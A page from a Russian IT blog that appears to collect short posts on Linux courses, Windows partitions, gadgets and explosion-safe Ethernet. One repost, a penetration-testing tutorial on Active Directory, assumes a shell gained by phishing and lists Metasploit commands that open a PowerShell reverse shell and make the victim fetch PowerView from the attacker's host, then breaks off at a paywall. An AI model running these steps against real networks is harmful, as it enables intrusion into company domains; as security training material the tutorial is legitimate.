-Музыка

 -Поиск по дневнику

Поиск сообщений в it_is_it

 -Подписка по e-mail

 

 -Статистика

Статистика LiveInternet.ru: показано количество хитов и посетителей
Создан: 17.08.2005
Записей: 347
Комментариев: 103
Написано: 508




Записи содержат ненормативную лексику! Описание того, что я делаю на работе.


Курс "Базовое администрирование Linux", Технопарк Mail.ru Group, МГТУ им. Н.Э. Баумана

Понедельник, 08 Февраля 2016 г. 16:14 + в цитатник

Системное администрирование Linux.

Понедельник, 08 Февраля 2016 г. 16:07 + в цитатник
095 (it_is_it) все записи автора Часть 1.
Видео группы https://vk.com/shkola_sysadm


История дистрибутивов CentOS и Debian, версии, системные требования. Манипулирование…

ОБХОД БЛОКИРОВОК

Суббота, 06 Февраля 2016 г. 17:55 + в цитатник

Если..

Четверг, 04 Февраля 2016 г. 13:04 + в цитатник
095 (it_is_it) все записи автора дедушка у тебя - мэр Сиэтла, папа - адвокат, мама - в трех советах директоров (в том числе - IBM). В общем, вся семья - одна из влиятельнейших в штате Вашингтон и городе Сиэтле.
То:
мэрия Сиэтла заключает с тобою, десятиклассником, контракт
ты можешь себе позволить купить у Seattle Computer Products их программу и тут же перепродать её уже упомянутой компании IBM
дальше - инновационная практика грязного ведения бизнеса с нарушением антимонопольного законодательства
потом - ..
в общем, оглянуться не успеваешь и вот ты уже на вершине Мира:


)

Четверг, 04 Февраля 2016 г. 12:44 + в цитатник

WinXP, на экране написано: Возможно вы преобрели поддельную копию..

Среда, 03 Февраля 2016 г. 14:40 + в цитатник

Как удалить раздел восстановления

Среда, 03 Февраля 2016 г. 14:19 + в цитатник
095 (it_is_it) все записи автора Win7 (а также Win8), как известно, "откусывает" небольшой кусочек диска под раздел восстановления.
Удалить этот раздел методом "в лоб" невозможно - доступен лишь один пункт в меню "справка".
Иногда этот раздел надо удалить. В прошлый раз я воспользовался killdisk - вполне успешно.
Но, как выяснилось, это можно сделать еще проще и без сторонних программ - используя diskpart.

Поехали:

анлоки телефонов за бабки и прочий хакинг

Вторник, 02 Февраля 2016 г. 14:21 + в цитатник

запчасти

Вторник, 02 Февраля 2016 г. 14:19 + в цитатник
Reeder (it_is_it) все записи автора

ЗАПЧАСТИ И АКСЕССУАРЫ ДЛЯ СОТОВЫХ ТЕЛЕФОНОВ - ПАЯЛЬНОЕ ОБОРУДОВАНИЕ - ИЗМЕРИТЕЛЬНЫЕ ПРИБОРЫ - РАСХОДНЫЕ МАТЕРИАЛЫ - РАДИОСТАНЦИИ - ИНСТРУМЕНТЫ ДЛЯ ЮВЕЛИРОВ

тонкость -  заказ от тыщи рублей, а цены низкие 
:)

http://siriust.ru/


Все российские IT-компании

Воскресенье, 24 Января 2016 г. 15:10 + в цитатник

Orico OPC-2A4U. Сетевой фильтр и зарядное устройство в одном флаконе

Воскресенье, 24 Января 2016 г. 02:17 + в цитатник
095 (it_is_it) все записи автора http://ru-sku.livejournal.com/1135129.html
ORICO OPC-2A4U Desk Intelligent Digital Power Socket with 4 USB Charging Port Independent Switch Universal Plug Port;
Цена - $ 32.29
309243_600[1] (600x450, 35Kb)

Chuwi Hi12 - 12" планшет о 2-х осях за 250$

Понедельник, 18 Января 2016 г. 21:38 + в цитатник

защищённые корпуса и разработка на заказ

Пятница, 15 Января 2016 г. 15:39 + в цитатник

мораль. уведомления по подписке.

Четверг, 14 Января 2016 г. 17:06 + в цитатник
Reeder (it_is_it) все записи автора

что б они приходили нужно сначала отписаться от сообщества, а потом подписаться!


обеспечение искробезопасности

Среда, 13 Января 2016 г. 20:47 + в цитатник
Reeder (it_is_it) все записи автора

брошюра phoenix contact

http://iprog.pp.ru/forum/read.php?f=1&i=44700&t=44700

Монастырский Олег писал(а):

> Задача выглядит следующим образом:
> Есть взрывоопасное помещени (зона класса В-1Г)  в котором устанавливаеться
> локальный пульт управления на базе плосепанельного ПС в корпусе с исполнением
> IP-68. Это разрешено ПУЭ (раздел 7.1. в зоне класса В-1Г допускается
> использование не взрывозащищенного оборудования установленного в корпуса не ниже
> IP54).
> Питание этого плоскопанельного ПС осуществляется через барьер.

А зачем, собственно, барьер? ПС явно не является простым устройством (т.к. требует питания) и не сертифицирован  на Еxi. Следовательно, за барьером может накопиться мощность, достаточная для образования искры.
Вывод: при описанных Вами условиях создание канала, защищённого по виду взрывозащиты "искробезопасная электрическая цепь" невозможно (это - по технике). С формальной же точки зрения, цепь неискробезопасна, а значит, и невзрывобезопасна, т.к. Ваш ПС не имеет маркировки "Exi", и соответствующих сертификатов.

> С сервером осущестляеться связь по Ethernet.
> Вопрос в следующем....
> Как обеспечить искобезопасность этого канала??????

Может, стоит посмотреть в сторону Exd? Тем более, что первый шаг в эту сторону Вы уже сделали (IP68).


> или это не требуеться???

Это уж Вам обосновывать :-))

ИМХО, защита требуется.

> С огромным Уважение к сообществу жду ответов и рекомендаций.

C уважением, Глеб Олегович Кусакин.
Руководитель группы технических средств.
ООО «Ленпромавтоматика».

Искробезопасность канала не может быть обеспечена оболочкой. Искробезопасность канала обеспечивается применением искрозащитных барьеров в соответствии с ГОСТ Р 51330.10-99 (вид взрывозащиты "искробезопасная цепь i").

Оболочка IP не является средством обеспечения взрывозащиты, средством взрывозащиты является взрывонепроницаемая оболочка (вид взрывозащиты "d") в соответствии с ГОСТ Р 51330.1-99. Взрывонепроницаемая оболочка d должна иметь защиту не ниже IP54.

Если оболочка является взрывонепроницаемой и имеет степень защиты не ниже IP67, то она может трактоваться как "специальный вид взрывозащиты s" в соответствии с ГОСТ 22782.3-77. В сочетании с ia это может дать степень взрывозащиты "особовзрывобезопасное электрооборудование" (в соответствии с ГОСТ Р 51330.0-99).

Виталий Насенник
Нач. отдела АСУТП
ООО НПФ "Гранч"
http://www.granch.ru/

http://iprog.pp.ru/forum/read.php?f=1&i=44700&t=44700

т.о.  безопастность эзернет  пока осталось открытой,  надо искать.

 

 

Вложение: 4973675_obespechenie_vzryvobezopasnosti_teoria_i_praktika.pdf


#курсы

Среда, 13 Января 2016 г. 12:48 + в цитатник

#курсы

Среда, 13 Января 2016 г. 12:46 + в цитатник

#курсы

Суббота, 09 Января 2016 г. 07:26 + в цитатник

про АД из хакера

Суббота, 09 Января 2016 г. 02:17 + в цитатник
Reeder (it_is_it) все записи автора Active Directory — явление, довольно часто встречающееся при тестировании безопасности крупных компаний. Нередко попадается не одинокий домен в единственном лесу, а более ветвистая и более интереcная структура. Поэтому сегодня мы поговорим о том, как проводить разведку, изучать структуру леса, рассмотрим возможности поднятия привилегий. А завершим полной компрометацией всего леса предприятия!


О чем на этот раз

Не секрет, что многие, если не большинство крупных компаний используют службу каталогов Active Directory от небезызвестной MS. Причина достаточно очевидна. Такой подход позволяет многие вeщи автоматизировать, интегрировать все в одну слаженную структуру и облегчить жизнь как IT-отделу, так и всем сотрудникам.

Как правило, если организация довольно большая, то, развиваясь, она может приобретать другие (более мелкие) компании, устраивать слияния, расширения и прочие радости крупного бизнеса. Все это сказывается на структуре леса AD, который пополняется новыми деревьями и разрастается вширь и вглубь. Именно о такой разветвленной структуре мы и будем разговаривать. А начнем, по традиции, с небольшого теоретического введения.


В дремучих лесах AD

Бегло рассмотрим ключевые понятия Active Directory, которые постоянно будут использоваться в дальнейшем. Начнем от наименьшей структурной единицы AD — домена.

Доменом можно назвать логическую группу (пользователей, хостов, серверов и так далее), которые поддерживают централизованное администрирование.

Деревом называется набор доменов, которые используют общее пространство имен (по аналогии с обычным DNS). Важно, что дочерний домен автoматически получает двухсторонние доверительные отношения с родительским доменом.

Доверие — это своеобразное соглашение между двумя доменами, устанавливающее разрешения на доступ к тем или иным объектам или ресурсам.

Ну а лес, в свою очередь, является наиболее крупной структурой в Active Directory и объединяет все деревья. В результате все деревья в лесу обычно объединены двунаправленными доверительными отношениями, что позволяет пользователям в любом дереве получать доступ к ресурсам в любом другом, если они имеют соответствующие разрешения и права.

По умолчанию первый домен, создаваемый в лесу, автоматически становится его корневым доменом.

Завершив теоретический экскурс, можно переходить к практике, чем и займемся. При этом мы будем предполагать, что уже получен базовый доступ с небольшими пользовательскими привилегиями. Допустим, что социнженерия дала свои плоды и после отправки специально сформированного письма (например, с документом во вложении) кто-то открыл документ и мы получили шелл.


Проверяем боекомплект

Перед любыми боевыми действиями неплохо вначале осмотреть свой инструментарий и определиться, что будет использовaться. Для изучения Windows-окружения самый удобный инструмент на сегодняшний день — это PowerShell. Почему? Да потому, что он везде установлен (начиная с Windows 7/2008R2), позволяет работать и выполнять разнообразные командлеты рядовым пользователям и глубоко интегрирован в ОС.

Дефолтная политика, которая запрещает выполнение сторонних (неподписанных) PowerShell-скриптов, не является серьезной защитной мерой. Это просто защита от случайного запуска по двойному клику и очень легко обходится. По большому счету PowerShell — это целый фреймворк для постэксплуатации Windows. Естественно, по этой причине пентестеры уже несколько лет активно его используют, и написано множество различных модулей (скриптов), которые помогают автоматизировать те или иные действия.

Мы будем использовать лишь один такой модуль — PowerView, который входит в набор PowerTools. Изначально он создавался в рамках известного проекта Veil, но не так давно, после выхода впечатляющего фреймворка PowerShell Empire (который очень динамично развивается и требует отдельного рассмотрения), был перемещен и теперь является подпроектом PS Empire.

PowerView служит одновременно и заменой всех консольных net*-команд в Windows, и средством изучения AD. Отдельно стоит еще раз подчеркнуть, что большинство возможностей доступны с правами обычного пользователя.


Выдвигаемся на исходную

Напомню, что базовый доступ у нас уже есть, и для упрощения будем считать, что у нас есть шелл Meterpreter с правами рядового доменного пользователя. В этом году работа с PS в Метасплоите стала значительно удобнее, появилось несколько специализированных пейлоадов, чем и воспользуемся. Чтобы не потерять имеющуюся сессию, создадим новую, используя механизм payload_inject.

Для этого выполняем:
msf > use exploit/windows/local/payload_inject

В качестве полезной нагрузки, конечно же, выбираем powershell:
msf exploit(payload_inject) > set PAYLOAD windows/powershell_reverse_tcp

Теперь можно сразу указать модуль, который нужно импортировать в случае успешного запуска:
msf exploit(payload_inject) > set LOAD_MODULES http://10.54.0.181/powerview.ps1

Отмечу, что при желании можно даже указывать полный адрес до GitHub, в нашем случае PowerView будет скачиваться жертвой прямо с хоста атакующего.

Последним штрихом необходимо указать номер уже имеющейся сессии:
msf exploit(payload_inject) > set SESSION 1

Запускаем на выполнение (результат на рис. 1).

Рис. 1. PowerShell-сессия
Рис. 1. PowerShell-сессия


Ситуационная осведомленность

Теперь, когда у нас есть интерактивный PowerShell, можно внимательно изучить обстановку. Первым делом пригодятся две следующие команды:



Продолжение статьи доступно подписчикам

сжатый воздух в качестве аккумулятора

Пятница, 08 Января 2016 г. 23:59 + в цитатник
Reeder (it_is_it) все записи автора чтото я не уловил надро ещё раз посмотреть
http://www.cnbc.com/2015/01/09/a-lot-of-hot-air-why-energy-storage-matters.html


Поиск сообщений в it_is_it
Страницы: 17 16 [15] 14 13 ..
.. 1 Календарь